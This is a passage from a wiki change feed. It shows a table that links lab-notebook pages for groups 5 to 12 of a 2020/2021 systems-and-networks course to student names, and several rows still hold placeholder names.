| NOM Prénom&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G5 | Cahier groupe n°5]]&lt;br /&gt;
| GLAINE Alexandre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G6 | Cahier groupe n°6]]&lt;br /&gt;
| VITTECOQ Thomas&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G7 | Cahier groupe n°7]]&lt;br /&gt;
| CHENU Léna &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G8 | Cahier groupe n°8]]&lt;br /&gt;
| COULON Nathan&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G9 | Cahier groupe n°9]]&lt;br /&gt;
| NOM Prénom&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G10 | Cahier groupe n°10]]&lt;br /&gt;
| NOM Prénom&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G11 | Cahier groupe n°11]]&lt;br /&gt;
| NOM Prénom&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G12 | Cahier groupe n°12]]&lt;br /&gt;
| NOM Prénom&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	</feed>